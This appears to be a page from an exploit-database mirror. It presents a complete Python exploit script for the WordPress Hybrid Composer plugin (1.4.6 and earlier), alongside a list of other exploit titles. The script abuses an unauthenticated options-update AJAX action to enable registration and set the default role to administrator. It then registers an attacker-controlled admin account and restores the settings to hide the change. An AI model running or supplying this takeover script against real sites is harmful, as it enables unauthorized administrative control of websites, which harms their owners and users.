Menu

Search for hundreds of thousands of exploits

"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions"

Author

yasin

Platform

php

Release date

2019-07-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover)
# Date: 2019-07-24
# Vendor Homepage: http://wordpress.framework-y.com
# Software Link:  http://wordpress.framework-y.com/hybrid-composer/
# Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452
# Affected version: <= 1.4.6
# Researcher: rootetsy
# Exploit Author: yasin
# Tested on: Linux
# Vulnerability discovered by rootetsy

 
# Summary
The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table.

# Description
A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities.
index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action.


# Usage: python exploit.py 



###########################################################
import httplib, urllib
import sys 
import random
# pip install httplib urllib random

site = raw_input("[+] Target: ")
url = "/wp-admin/admin-ajax.php"
username = "user-%d" % random.randrange(1000000, 3000000)
email = raw_input("[+] E-mail: ")
  
def ChangeOption(site, url, option_name, content):
    params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    data = response.read()
    conn.close()
registration_url= "/wp-login.php"
def AdminTakeover(site, registration_url, user_login, user_email):
    params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
    conn.request("POST", registration_url, params, headers)
    response = conn.getresponse()
    data = response.read()
    conn.close()
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")      
print "[+] Registering new admin user"
AdminTakeover(site, registration_url, username, email)
print "[+] Check your email for password: " + username + "[" + email + "]"
ChangeOption(site, url, "users_can_register", "0")
ChangeOption(site, url, "default_role", "subscriber") 


###########################################################
Release Date Title Type Platform Author
2019-08-20 "WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-19 "YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection" webapps php "Fabian Mosch"
2019-08-19 "Neo Billing 3.5 - Persistent Cross-Site Scripting" webapps php n1x_
2019-08-19 "Kimai 2 - Persistent Cross-Site Scripting" webapps php osamaalaa
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
Release Date Title Type Platform Author
2019-07-24 "WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions" webapps php yasin
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47154/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47154/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47154/41539/wordpress-plugin-hybrid-composer-146-improper-access-restrictions/download/", "exploit_id": "47154", "exploit_description": "\"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions\"", "exploit_date": "2019-07-24", "exploit_author": "yasin", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse